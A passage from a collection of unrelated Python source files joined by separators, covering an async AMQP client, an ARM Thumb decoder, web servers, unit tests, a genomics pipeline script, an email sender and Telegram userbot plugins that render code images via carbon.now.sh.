frame_max=self.connection_tune.frame_max,
heartbeat=self.connection_tune.heartbeat,
), wait_response=False)
await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
# noinspection PyAsyncCall
self.create_task(self.__reader())
# noinspection PyAsyncCall
self.create_task(self.__heartbeat_task())
self.loop.call_soon(self.connected.set)
return True
async def __heartbeat_task(self):
if not self.connection_tune.heartbeat:
return
heartbeat_interval = (
self.connection_tune.heartbeat * self.HEARTBEAT_INTERVAL_MULTIPLIER
)
heartbeat_grace_timeout = (
self.connection_tune.heartbeat * self.HEARTBEAT_GRACE_MULTIPLIER
)
while True:
await asyncio.sleep(heartbeat_interval)
# Send heartbeat to server unconditionally
self.writer.write(self._HEARTBEAT)
if not self.heartbeat_monitoring:
continue
# Check if the server sent us something
# within the heartbeat grace period
last_heartbeat = self.loop.time() - self.heartbeat_last_received
if last_heartbeat <= heartbeat_grace_timeout:
continue
await self.close(
ConnectionError(
'Server connection probably hang, last heartbeat '
'received %.3f seconds ago' % last_heartbeat
)
)
return
async def __receive_frame(self) -> typing.Tuple[int, int, spec.Frame]:
async with self.lock:
frame_header = await self.reader.readexactly(1)
if frame_header == b'\0x00':
raise spec.AMQPFrameError(await self.reader.read())
frame_header += await self.reader.readexactly(6)
if not self.started and frame_header.startswith(b'AMQP'):
raise spec.AMQPSyntaxError
else:
self.started = True
frame_type, _, frame_length = pamqp.frame.frame_parts(
frame_header
)
frame_payload = await self.reader.readexactly(
frame_length + 1
)
return pamqp.frame.unmarshal(frame_header + frame_payload)
@staticmethod
def __exception_by_code(frame: spec.Connection.Close):
if frame.reply_code == 501:
return exc.ConnectionFrameError(frame.reply_text)
elif frame.reply_code == 502:
return exc.ConnectionSyntaxError(frame.reply_text)
elif frame.reply_code == 503:
return exc.ConnectionCommandInvalid(frame.reply_text)
elif frame.reply_code == 504:
return exc.ConnectionChannelError(frame.reply_text)
elif frame.reply_code == 505:
return exc.ConnectionUnexpectedFrame(frame.reply_text)
elif frame.reply_code == 506:
return exc.ConnectionResourceError(frame.reply_text)
elif frame.reply_code == 530:
return exc.ConnectionNotAllowed(frame.reply_text)
elif frame.reply_code == 540:
return exc.ConnectionNotImplemented(frame.reply_text)
elif frame.reply_code == 541:
return exc.ConnectionInternalError(frame.reply_text)
else:
return exc.ConnectionClosed(frame.reply_code, frame.reply_text)
@task
async def __reader(self):
try:
while not self.reader.at_eof():
weight, channel, frame = await self.__receive_frame()
self.heartbeat_last_received = self.loop.time()
if channel == 0:
if isinstance(frame, spec.Connection.Close):
return await self.close(self.__exception_by_code(frame))
elif isinstance(frame, Heartbeat):
continue
log.error('Unexpected frame %r', frame)
continue
if self.channels.get(channel) is None:
log.exception(
"Got frame for closed channel %d: %r", channel, frame
)
continue
ch = self.channels[channel]
channel_close_responses = (
spec.Channel.Close,
spec.Channel.CloseOk
)
if isinstance(frame, channel_close_responses):
self.channels[channel] = None
await ch.frames.put((weight, frame))
except asyncio.CancelledError as e:
log.debug("Reader task cancelled:", exc_info=e)
except asyncio.IncompleteReadError as e:
log.debug("Can not read bytes from server:", exc_info=e)
await self.close(ConnectionError(*e.args))
except Exception as e:
log.debug("Reader task exited because:", exc_info=e)
await self.close(e)
async def _on_close(self, exc=exc.ConnectionClosed(0, 'normal closed')):
writer = self.writer
self.reader = None
self.writer = None
# noinspection PyShadowingNames
writer.close()
return await writer.wait_closed()
@property
def server_capabilities(self) -> ArgumentsType:
return self.server_properties['capabilities']
@property
def basic_nack(self) -> bool:
return self.server_capabilities.get('basic.nack')
@property
def consumer_cancel_notify(self) -> bool:
return self.server_capabilities.get('consumer_cancel_notify')
@property
def exchange_exchange_bindings(self) -> bool:
return self.server_capabilities.get('exchange_exchange_bindings')
@property
def publisher_confirms(self):
return self.server_capabilities.get('publisher_confirms')
async def channel(self, channel_number: int = None,
publisher_confirms=True,
frame_buffer=FRAME_BUFFER, **kwargs) -> Channel:
await self.connected.wait()
if self.is_closed:
raise RuntimeError('%r closed' % self)
if not self.publisher_confirms and publisher_confirms:
raise ValueError("Server doesn't support publisher_confirms")
if channel_number is None:
async with self.last_channel_lock:
while self.last_channel in self.channels.keys():
self.last_channel += 1
if self.last_channel > 65535:
log.warning("Resetting channel number for %r", self)
self.last_channel = 1
# switching context for prevent blocking event-loop
await asyncio.sleep(0)
channel_number = self.last_channel
elif channel_number in self.channels:
raise ValueError("Channel %d already used" % channel_number)
if channel_number < 0 or channel_number > 65535:
raise ValueError('Channel number too large')
channel = Channel(
self, channel_number, frame_buffer=frame_buffer,
publisher_confirms=publisher_confirms, **kwargs
)
self.channels[channel_number] = channel
try:
await channel.open()
except Exception:
self.channels[channel_number] = None
raise
return channel
async def __aenter__(self):
await self.connect()
async def connect(url, *args, **kwargs) -> Connection:
connection = Connection(url, *args, **kwargs)
try:
await connection.connect()
except Exception as e:
await connection.close(e)
raise
return connection
|
from lsl_register_t2 import LslRegisterT2
from lsr_register_t2 import LsrRegisterT2
from asr_register_t2 import AsrRegisterT2
from ror_register_t2 import RorRegisterT2
from sxtah_t1 import SxtahT1
from sxth_t2 import SxthT2
from uxtah_t1 import UxtahT1
from uxth_t2 import UxthT2
from sxtab16_t1 import Sxtab16T1
from sxtb16_t1 import Sxtb16T1
from uxtab16_t1 import Uxtab16T1
from uxtb16_t1 import Uxtb16T1
from sxtab_t1 import SxtabT1
from sxtb_t2 import SxtbT2
from uxtab_t1 import UxtabT1
from uxtb_t2 import UxtbT2
import thumb_parallel_addition_and_subtraction_signed
import thumb_parallel_addition_and_subtraction_unsigned
import thumb_miscellaneous_operations
def decode_instruction(instr):
if instr[8:11] == "0b000" and instr[24:28] == "0b0000":
# Logical Shift Left
return LslRegisterT2
elif instr[8:11] == "0b001" and instr[24:28] == "0b0000":
# Logical Shift Right
return LsrRegisterT2
elif instr[8:11] == "0b010" and instr[24:28] == "0b0000":
# Arithmetic Shift Right
return AsrRegisterT2
elif instr[8:11] == "0b011" and instr[24:28] == "0b0000":
# Rotate Right
return RorRegisterT2
elif instr[8:12] == "0b0000" and instr[24] and instr[12:16] != "0b1111":
# Signed Extend and Add Halfword
return SxtahT1
elif instr[8:12] == "0b0000" and instr[24] and instr[12:16] == "0b1111":
# Signed Extend Halfword
return SxthT2
elif instr[8:12] == "0b0001" and instr[24] and instr[12:16] != "0b1111":
# Unsigned Extend and Add Halfword
return UxtahT1
elif instr[8:12] == "0b0001" and instr[24] and instr[12:16] == "0b1111":
# Unsigned Extend Halfword
return UxthT2
elif instr[8:12] == "0b0010" and instr[24] and instr[12:16] != "0b1111":
# Signed Extend and Add Byte 16-bit
return Sxtab16T1
elif instr[8:12] == "0b0010" and instr[24] and instr[12:16] == "0b1111":
# Signed Extend Byte 16-bit
return Sxtb16T1
elif instr[8:12] == "0b0011" and instr[24] and instr[12:16] != "0b1111":
# Unsigned Extend and Add Byte 16-bit
return Uxtab16T1
elif instr[8:12] == "0b0011" and instr[24] and instr[12:16] == "0b1111":
# Unsigned Extend Byte 16-bit
return Uxtb16T1
elif instr[8:12] == "0b0100" and instr[24] and instr[12:16] != "0b1111":
# Signed Extend and Add Byte
return SxtabT1
elif instr[8:12] == "0b0100" and instr[24] and instr[12:16] == "0b1111":
# Signed Extend Byte
return SxtbT2
elif instr[8:12] == "0b0101" and instr[24] and instr[12:16] != "0b1111":
# Unsigned Extend and Add Byte
return UxtabT1
elif instr[8:12] == "0b0101" and instr[24] and instr[12:16] == "0b1111":
# Unsigned Extend Byte
return UxtbT2
elif instr[8] and instr[24:26] == "0b00":
# Parallel addition and subtraction, signed
return thumb_parallel_addition_and_subtraction_signed.decode_instruction(instr)
elif instr[8] and instr[24:26] == "0b01":
# Parallel addition and subtraction, unsigned
return thumb_parallel_addition_and_subtraction_unsigned.decode_instruction(instr)
elif instr[8:10] == "0b01" and instr[24:26] == "0b01":
# Miscellaneous operations
return thumb_miscellaneous_operations.decode_instruction(instr)
|
from absl import logging
import datetime
import os.path
import tornado.ioloop
import tornado.web
from icubam.db import store
class HealthHandler(tornado.web.RequestHandler):
ROUTE = '/health'
def initialize(self, start_time):
self.start_time = start_time
def get(self):
return self.write("{0:%Y/%m/%d %H:%M:%S}".format(self.start_time))
class BaseServer:
"""Base class for ICUBAM servers."""
def __init__(self, config, port, root=''):
self.config = config
self.port = port
self.root = root
self.routes = []
self.db_factory = store.create_store_factory_for_sqlite_db(self.config)
self.routes = []
self.start_time = datetime.datetime.utcnow()
self.add_handler(HealthHandler, start_time=self.start_time)
self.callbacks = []
def add_handler(self, handler, **kwargs):
route = os.path.join("/", self.root, handler.ROUTE.lstrip('/'))
self.routes.append((route, handler, kwargs))
logging.info("{}: {} serving on {}".format(
self.__class__.__name__, handler.__name__, route))
def make_app(self) -> tornado.web.Application:
return tornado.web.Application(self.routes)
def run(self):
logging.info(
"{} running on port {}".format(self.__class__.__name__, self.port)
)
app = self.make_app()
app.listen(self.port)
io_loop = tornado.ioloop.IOLoop.current()
for callback_obj in self.callbacks:
io_loop.spawn_callback(callback_obj)
io_loop.start()
|
# vim: set encoding=utf-8
from unittest import TestCase
from mock import patch
from django.conf import settings
from django.test import RequestFactory
from regulations.views import utils
class UtilsTest(TestCase):
def setUp(self):
if hasattr(settings, 'ANALYTICS'):
self.old_analytics = settings.ANALYTICS
if hasattr(settings, 'JS_DEBUG'):
self.old_js_debug = settings.JS_DEBUG
def tearDown(self):
if hasattr(self, 'old_analytics'):
settings.ANALYTICS = self.old_analytics
if hasattr(self, 'old_js_debug'):
settings.JS_DEBUG = self.old_js_debug
def test_get_layer_list(self):
names = 'meta,meta,GRAPHICS,fakelayer,internal'
layer_list = utils.get_layer_list(names)
self.assertEquals(set(['meta', 'internal', 'graphics']), layer_list)
def test_layer_names(self):
request = RequestFactory().get('/?layers=graphics,meta,other')
self.assertEqual(utils.layer_names(request), set(['graphics', 'meta']))
request = RequestFactory().get('/?layers=')
self.assertEqual(utils.layer_names(request), set())
request = RequestFactory().get('/')
self.assertTrue(len(utils.layer_names(request)) > 4)
@patch('regulations.views.utils.fetch_toc')
def test_first_section(self, fetch_toc):
fetch_toc.return_value = [
{'section_id': '204-100', 'index': ['204', '100']},
{'section_id': '204-101', 'index': ['204', '101']}]
first = utils.first_section('204', '2')
self.assertEqual(first, '204-100')
def test_make_sortable(self):
"""Verify that strings get decomposed correctly into sortable tuples"""
self.assertEqual(utils.make_sortable("abc"), ("abc",))
self.assertEqual(utils.make_sortable("123"), (123,))
self.assertEqual(utils.make_sortable("abc123def456"),
("abc", 123, "def", 456))
self.assertEqual(utils.make_sortable("123abc456"), (123, "abc", 456))
@patch('regulations.views.utils.api_reader')
def test_regulation_meta_404(self, api_reader):
"""We shouldn't crash if meta data isn't available"""
ret_vals = [None, {}, {'111-22': 'something'}]
for ret_val in ret_vals:
api_reader.ApiReader.return_value.layer.return_value = ret_val
self.assertEqual({}, utils.regulation_meta('111', 'vvv'))
|
from flask import Flask
from flask import request
from flask import render_template,url_for
from PIL import Image
import io
import base64
import cv2
import numpy as np
import urllib
from joblib import dump, load
from binascii import a2b_base64
import tensorflow as tf
try:
model = tf.keras.models.load_model('my_model')
except :
print("No model")
pass
#MARK
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
def resize_image(image):
image = cv2.resize(image, (28,28))
return image
def recognize_image(image, is_tf = False):
print("tensorflow")
image = image/255.0
return "TF",model.predict_classes( np.array( [image,] ))
@app.route('/')
def index():
return render_template("index.html")
@app.route('/recognize', methods=['GET','POST'])
def analyze():
if request.method == 'POST':
data_url = request.values.get('data')
model_type = request.values.get('type')
encoded_image = data_url.split(",")[1]
binary_data = a2b_base64(encoded_image)
data_io = io.BytesIO(binary_data)
img = Image.open(data_io)
image_np = np.array(img)
image_np = image_np[:, :, 3]
resized = resize_image(image_np)
model_type = False if model_type == "0" else True
a = recognize_image(resized, is_tf=model_type)
return str(a)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000, debug=True) |
"""Test for the snakemake workflow distributed with region_set_profiler"""
import json
import subprocess
import os
import pandas as pd
import numpy as np
tmpdir = "/icgc/dkfzlsdf/analysis/hs_ontogeny/temp"
# TODO: gtfanno result has weird index
gtfanno_result: pd.DataFrame = pd.read_pickle(
"/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/annotation/hierarchy-dmrs/v1/hierarchy-dmrs-anno_primary-annotations.p"
)
# all_regions_annotated = pd.read_pickle('/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/annotation/hierarchy-dmrs/v1/hierarchy-dmrs-anno_all-annotations.p')
# all_regions_annotated.loc[all_regions_annotated.feat_class == 'intergenic', 'feature_rank'] = 'primary'
# gtfanno_result_temp = '/home/kraemers/temp/gtfanno-temp.p'
# primary_annotations.to_pickle(gtfanno_result_temp)
# gtfanno_result = primary_annotations
gene_annos = gtfanno_result.groupby(["Chromosome", "Start", "End", "gtfanno_uid"])[
"gene_name"
].aggregate(lambda ser: ser.str.cat(sep=","))
assert (
gene_annos.index.get_level_values("gtfanno_uid") == np.arange(gene_annos.shape[0])
).all()
gene_annos.index = gene_annos.index.droplevel(3)
clustered_gene_anno_fp = tmpdir + "clustered-gene-annos.p"
gene_annos.to_pickle(clustered_gene_anno_fp)
# Code to merge DMRs which are closer than merging_distance bp
# This should be moved elsewhere
# merging could also be achieved with pyranges:
# 1. slop all intervals with merging_distance on both sides
# 2. Cluster all intervals
# 3. Use the clustered intervals to find groups of intervals within the clustered intervals and compute the group annotations
merging_distance = 500
gtfanno_result = gtfanno_result.query('feat_class == "Promoter"')
distance_to_next_region = (
gtfanno_result.Start.iloc[1:].values - gtfanno_result.End.iloc[0:-1].values
)
# we iterate over the regions
# whenever the distance to the next region is > merging_distance, we begin a new cluster of regions
# In vectorized form:
region_cluster_ids = np.concatenate(
[[1], 1 + np.cumsum(distance_to_next_region > merging_distance)], axis=0
)
# Compress to gene anno series for the merged DMRs
gene_annos = gtfanno_result.groupby(region_cluster_ids)["gene_name"].apply(
lambda ser: ser.str.cat(sep=",")
)
gene_annos.to_pickle(clustered_gene_anno_fp)
gtfanno_result["gene_name"].to_pickle(clustered_gene_anno_fp)
config = {
"tasks": {
"cluster_ids": {
"no-basos/beta-value_zscores/metric-euclidean/linkage-ward/enrichments/min-gap_0.25": (
"min-gap_0.25",
"/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/clustering/full-hierarchy/method-selection/no-basos/beta-value_zscores/metric-euclidean/linkage-ward/cutree-all.p",
),
# 'no-basos/beta-value_zscores/metric-euclidean/linkage-ward/enrichments/min-gap_0.12': ('min-gap_0.12',
# '/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/clustering/full-hierarchy/method-selection/no-basos/beta-value_zscores/metric-euclidean/linkage-ward/cutree-all.p')
},
"metadata_tables": {
"codex": "/icgc/dkfzlsdf/analysis/hs_ontogeny/databases/enrichment_databases/lola_chipseq_2018-04-12/mm10/codex/regions/codex_annotations.csv",
"msigdb_canonical_pathways": "/icgc/dkfzlsdf/analysis/hs_ontogeny/databases/region_set_profiler_databases/msigdb_gmts/canonical-pathways.gmt",
},
"gene_annotations": {"promoters_500-bp-clusters": clustered_gene_anno_fp},
},
"output_dir": "/icgc/dkfzlsdf/analysis/hs_ontogeny/temp/rsp-tests",
"tmpdir": tmpdir,
"chromosomes": [
"1",
"10",
"11",
"12",
"13",
"14",
"15",
"16",
"17",
"18",
"19",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
],
}
config_fp = os.path.expanduser("~/temp/rsp-config.json")
with open(config_fp, "w") as fout:
json.dump(config, fout)
subprocess.run(
f"""
snakemake \
--snakefile {os.path.expanduser('~/projects/region_set_profiler/src/region_set_profiler/region_set_profiler.smk')} \
--configfile {config_fp} \
--cores 24 \
--keep-going \
--forcerun /icgc/dkfzlsdf/analysis/hs_ontogeny/temp/rsp-tests/no-basos/beta-value_zscores/metric-euclidean/linkage-ward/enrichments/min-gap_0.25/msigdb_canonical_pathways:promoters_500-bp-clusters/msigdb_canonical_pathways:promoters_500-bp-clusters.done
""",
shell=True,
executable="/bin/bash",
)
# --dryrun \
|
"""
TCKDB backend app db base_class module
allows the creation of classes that include directives to describe the actual database table they will be mapped to
"""
from sqlalchemy.ext.declarative import declarative_base, declared_attr
class CustomBase(object):
"""
A custom base class for generating __tablename__ automatically
"""
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
Base = declarative_base(cls=CustomBase)
|
import numpy as np
arr = [[1,2,0],[0,1,1]]
arr = np.asarray(arr)
H = np.dot(arr,arr.T)
eigenval , eigenvec = np.linalg.eig(H)
print "----------A-----------"
print "eigen value is :" ,eigenval
print "eigen vector is :" ,eigenvec
print "----------B-----------"
u, s, vh = np.linalg.svd(arr, full_matrices=True)
print "s is :" ,u
print "v is :" ,s
print "d is :" ,vh |
import configparser
from email.mime.text import MIMEText
from email.header import Header
import smtplib
import logging
import sys
# 配置日志信息 输出到控制台
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
stream=sys.stdout)
def getConf():
config = configparser.ConfigParser()
config.read('sendemail/local.conf')
return config
def sendEmail(mail_msg,subject):
config = getConf()
strFrom = config.get("email", "sender")
strTo = config.get("email", "receivers")
code = config.get("email", "code")
message = MIMEText(mail_msg, 'html', 'utf-8')
message['Subject'] = Header(subject, 'utf-8')
message['To'] = strTo;
message['From'] = strFrom;
#ssl登录
smtp = smtplib.SMTP_SSL('smtp.qq.com')
smtp.connect('smtp.qq.com')
smtp.login(strFrom, code)
try:
smtp.sendmail(strFrom,strTo,message.as_string())
finally:
smtp.close
def getContext():
mail_msg = """
<ul type='circle'>
<li>hello python3</li>
</ul>
"""
subject = '测试基于python3的QQ邮件发送功能'
return mail_msg,subject
if __name__ == '__main__':
logging.info("begin send email")
mail_msg,subject = getContext()
sendEmail(mail_msg,subject)
logging.info("end send email")
|
"""
Creates Singedup Home Tap
:license: MIT
"""
import json
from src.dependencies.dependency_typing import PynamoDBConsultant
def create_home_tap(consultant_uuid: str, consultant_model: PynamoDBConsultant):
'''
Creates Home tap with correct time from Consultant
-
:param consultant_uuid: Uuid of Consultant
:param consultant_model: Consultant Model
'''
consultant = consultant_model.get(consultant_uuid)
with open("src/templates/{0}.json".format('home_tap_template_signedup'), "r") as body:
home_tap = json.load(body)
if consultant.time_for_checkin is not None:
home_tap['blocks'][4]['elements'][0]['initial_time'] = consultant.time_for_checkin
if consultant_model.same_day_checkin is not None:
print(consultant.same_day_checkin)
if str(consultant.same_day_checkin) == 'True':
home_tap['blocks'][5]['elements'][0]['initial_options'] =\
[home_tap['blocks'][5]['elements'][0]['options'][0]]
print(home_tap)
return home_tap
|
# -*- coding: utf-8 -*-
"""
Part of slugdetection package
@author: Deirdree A Polak
github: dapolak
"""
import numpy as np
import pandas as pd
import math
import unittest
from slugdetection.Slug_Forecasting import Slug_Forecasting
class Test_Slug_Forecasting(unittest.TestCase):
"""
Unit tests class for Slug Forecasting class
"""
def test_create_class(self, whp_pandas):
"""
Unit test for class creation
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy()) # Instantiate class
assert hasattr(test_class, "slug_df"), "slug_df attribute must be created"
assert isinstance(test_class.slug_df.index, pd.DatetimeIndex), "slug_df has DateTimeIndex"
whp_pandas_short = whp_pandas[:60].copy() # crop data frame
# Test that class does not get created if whp_pandas is too short
try:
test_class = Slug_Forecasting(whp_pandas_short)
print("pandas data frame is too short")
raise ValueError
except AssertionError:
pass
whp_pandas_nowhp = whp_pandas.copy()
whp_pandas_nowhp = whp_pandas_nowhp.drop("WH_P", axis=1)
# Test that class does not get created if whp_pandas does not contain WHP column
try:
test_class = Slug_Forecasting(whp_pandas_nowhp)
print("pandas data frame does not contain WH_P column")
raise ValueError
except AssertionError:
pass
whp_pandas_nots = whp_pandas.copy()
whp_pandas_nots = whp_pandas_nots.drop("ts", axis=1)
# Test that class does not get created if whp_pandas does not contain timestamp column
try:
test_class = Slug_Forecasting(whp_pandas_nots)
print("pandas data frame does not contain ts column")
raise ValueError
except AssertionError:
pass
# Test that other column in whp_pandas get ignored and dropped from slug_df attribute
whp_pandas_extravar = whp_pandas.copy()
whp_pandas_extravar["random"] = whp_pandas_extravar["WH_P"]
test_class = Slug_Forecasting(whp_pandas_extravar.copy())
assert "random" not in test_class.slug_df.columns, "In this example, random column should have been dropped"
def test_stationarity_check(self, whp_pandas, not_station_pd):
"""
Unit test for stationarity_check method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
not_station_pd : Pandas DataFrame
whp and ts data frame with non stationary data
"""
test_class = Slug_Forecasting(whp_pandas.copy()) # Instantiate class object
test_class.stationarity_check()
assert hasattr(test_class, "station_result"), "Station_result attribute is created"
assert test_class.station_result[0] < 0.05, "In this example, p-value should be less than 5%"
test_class.stationarity_check(diff=1)
assert test_class.station_result[0] <= 0.0, "In this example, p-value should be 0%"
test_class = Slug_Forecasting(not_station_pd.copy()) # Instantiate new object with non stationary data
test_class.stationarity_check()
assert test_class.station_result[0] > 0.05, "In this example, p-value should be more than 5%"
def test_split_data(self, whp_pandas):
"""
Unit test for split_data method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy())
test_class.stationarity_check()
test_class.split_data()
assert hasattr(test_class, "y_train"), "y_train attribute must have been create"
assert hasattr(test_class, "y_pred"), "y_test attribute must have been create"
assert len(test_class.y_train) == 180, "In this example, y_train should be 180 long"
assert len(test_class.y_pred) == 60, "In this example, y_pred should be 60 long"
test_class = Slug_Forecasting(whp_pandas.copy())
# test train size data
try:
test_class.split_data(train_size=400)
print("Not enough data to fulfill train_size requirement")
raise ValueError
except AssertionError:
pass
def test_ARIMA_model(self, whp_pandas):
"""
Unit test for ARIMA_model method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy())
test_class.stationarity_check()
test_class.split_data()
test_class.ARIMA_model(1, 0, 1, show=False) # Fit results
assert hasattr(test_class, "fit_results"), "fit_results attribute must have been created"
def test_error_metrics(self, whp_pandas):
"""
Unit test for error_metrics method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy())
test_class.stationarity_check()
test_class.split_data()
test_class.ARIMA_model(1, 0, 1, show=False)
# Test error metrics parameter entry
assert test_class.error_metrics(error="other", verbose=False) == None, "Nothing is returned"
# Test values returned for fitting regression
assert len(test_class.error_metrics(error="fit", verbose=False)) == 4, \
"Three variables must be returned in this example"
mape, mse, rmse, r2 = test_class.error_metrics(error="fit", verbose=False)
# test stats:
assert r2 < 1.0, "Coefficient of Determination r2 should be less than 1"
assert np.isclose(math.sqrt(mse), rmse, atol=0.01), \
"Square rooted mean squared error should equal root mean squared error"
test_class.ARIMA_pred(pred_time=60, show=False) # Forecast values
# Test values returned for forecasting regression
assert len(test_class.error_metrics(error="pred", verbose=False)) == 4, \
"Three variables must be returned in this example"
mape, mse, rmse, r2 = test_class.error_metrics(error="pred", verbose=False)
# test stats:
assert r2 < 1.0, "Coefficient of Determination r2 should be less than 1"
assert np.isclose(math.sqrt(mse), rmse, atol=0.01), \
"Square rooted mean squared error should equal root mean squared error"
def test_ARIMA_pred(self, whp_pandas):
"""
Unit test for error_metrics method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy())
test_class.stationarity_check()
test_class.split_data()
test_class.ARIMA_model(1, 0, 1, show=False)
test_class.ARIMA_pred(pred_time=60)
assert hasattr(test_class, "forecast"), "Forecast attribute must have been created" |
from baselines.common.cmd_util import make_vec_env, make_mujoco_env
from baselines.common.vec_env.vec_frame_stack import VecFrameStack
from arguments import achieve_arguments
from a2c_agent import a2c_agent
from baselines import logger
if __name__ == '__main__':
args = achieve_arguments()
#Logger helps to set correct logs for using tensorboard later
logger.configure(dir=args.log_dir)
# create environments
env_args = {'episode_life': False, 'clip_rewards': False}
#VecFrameStacks is Frame-Stacking with 4 frames for atari environments
#make_vec_env will make and wrap atari environments correctly in a vectorized form. Here we are also doing multiprocessing training with multiple environments
envs = VecFrameStack(make_vec_env(args.env_name, 'atari', args.num_processes, args.seed, wrapper_kwargs=env_args), 4)
trainer = a2c_agent(envs, args)
trainer.learn()
envs.close()
|
import asyncio
import os
import random
from urllib.parse import quote_plus
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from ..Config import Config
from . import drgub, deEmojify, edit_or_reply
plugin_category = "utils"
CARBONLANG = "auto"
@drgub.drg_cmd(
pattern="carbon(?:\s|$)([\s\S]*)",
command=("carbon", plugin_category),
info={
"header": "Carbon generators for given text (Fixed style)",
"usage": [
"{tr}carbon <text>",
"{tr}carbon <reply to text>",
],
},
)
async def carbon_api(event):
"""A Wrapper for carbon.now.sh"""
await event.edit("`Processing..`")
CARBON = "https://carbon.now.sh/?l={lang}&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[8:]:
pcode = str(pcode[8:])
elif textx:
pcode = str(textx.message)
pcode = deEmojify(pcode)
code = quote_plus(pcode)
drg = await edit_or_reply(event, "`Carbonizing...\n25%`")
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
await drg.edit("`Be Patient...\n50%`")
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
await drg.edit("`Processing..\n75%`")
await asyncio.sleep(2)
await drg.edit("`Done Dana Done...\n100%`")
file = "./carbon.png"
await drg.edit("`Uploading..`")
await event.client.send_file(
event.chat_id,
file,
caption="Here's your carbon",
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
driver.quit()
await drg.delete()
@drgub.drg_cmd(
pattern="krb(?:\s|$)([\s\S]*)",
command=("krb", plugin_category),
info={
"header": "Carbon generators for given text. each time gives random style. You can also use patcicular style by using semicolon after text and name",
"usage": [
"{tr}krb <text>",
"{tr}krb <reply to text>",
"{tr}krb <text> ; <style name>",
],
},
)
async def carbon_api(event):
"""A Wrapper for carbon.now.sh"""
drg = await edit_or_reply(event, "`Processing....`")
CARBON = "https://carbon.now.sh/?l={lang}&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[5:]:
pcodee = str(pcode[5:])
if ";" in pcodee:
pcode, skeme = pcodee.split(";")
else:
pcode = pcodee
skeme = None
elif textx:
pcode = str(textx.message)
skeme = None
pcode = pcode.strip()
skeme = skeme.strip()
pcode = deEmojify(pcode)
code = quote_plus(pcode)
await drg.edit("`Meking Carbon...`\n`25%`")
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
await drg.edit("`Be Patient...\n50%`")
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath(
"/html/body/div[1]/main/div[3]/div[2]/div[1]/div[1]/div/span[2]"
).click()
if skeme is not None:
k_skeme = driver.find_element_by_xpath(
"/html/body/div[1]/main/div[3]/div[2]/div[1]/div[1]/div/span[2]/input"
)
k_skeme.send_keys(skeme)
k_skeme.send_keys(Keys.DOWN)
k_skeme.send_keys(Keys.ENTER)
else:
color_scheme = str(random.randint(1, 29))
driver.find_element_by_id(("downshift-0-item-" + color_scheme)).click()
driver.find_element_by_id("export-menu").click()
driver.find_element_by_xpath("//button[contains(text(),'4x')]").click()
driver.find_element_by_xpath("//button[contains(text(),'PNG')]").click()
await drg.edit("`Processing..\n75%`")
await asyncio.sleep(2.5)
color_name = driver.find_element_by_xpath(
"/html/body/div[1]/main/div[3]/div[2]/div[1]/div[1]/div/span[2]/input"
).get_attribute("value")
await drg.edit("`Done Dana Done...\n100%`")
file = "./carbon.png"
await drg.edit("`Uploading..`")
await event.client.send_file(
event.chat_id,
file,
caption=f"`Here's your carbon!` \n**Colour Scheme: **`{color_name}`",
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
driver.quit()
await drg.delete()
@drgub.drg_cmd(
pattern="kar1(?:\s|$)([\s\S]*)",
command=("kar1", plugin_category),
info={
"header": "Carbon generators for given text (Fixed style)",
"usage": [
"{tr}kar1 <text>",
"{tr}kar1 <reply to text>",
],
},
)
async def carbon_api(event):
